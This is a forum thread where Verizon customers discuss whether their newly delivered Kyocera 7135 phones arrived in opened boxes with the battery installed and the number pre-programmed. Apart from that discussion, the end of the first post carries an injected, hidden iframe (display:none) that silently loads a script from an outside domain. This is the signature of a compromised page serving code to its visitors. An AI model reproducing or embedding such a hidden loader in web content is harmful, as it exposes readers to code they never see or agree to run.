+ Reply to Thread

New Phone Question

Just received my 7135 from Verizon Direct Fullfillment today. Just curious if someone knows the answer to this question. The box the phone was in was clearly previously opened. The battery was installed in the phone. Does Verizone need to program the phone prior to sending it to me or did they send a "used" phone?

Thanks,<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I got mine today too, and it was in the same state as yours: box seal was opened and battery was installed. I think Verizon did some programming prior to shipping. At least I hope that is the case.

db

FWIW:my box was unopened

i received mine saturday (4/12). the box looked factory sealed. the battery was wrapped up and not in the phone.
    -db

I received mine last week as well and the battery was separate from the phone and wrapped up but found my phone info was already pre-installed on the phone. Most units would be programmed with their own factory spare battery not usually with your own but I guess they do now.

tcv
    Mine was open, too. I am not too concerned about it. I figure that Verizon had to get it ready to be activated.

m

Mine was sealed with the Kyocera seal. The phone, battery and everything else inside was each in its own sealed plastic. The battery fully charged in about 1 hour though.

I have gotten two from the verizon both were sealed and battery was sealed and not installed.
    Linda

17" powerbook OSX

Mine came 4/8 & the battery plastic had been opened. I used Markito's spare whilie It charged so I could start using it right away and Verizon did Pre-program the phone with my phone number & PRL. I looked at the Phone info app and it was all thier. I called 611 FROM the 7135 to activate it! Once the call was over all I had to do was power down the phone and then turn it back on and I was all set.
    (the VZ rep was very jealous of my phone btw)
    iPhone therefore iAm.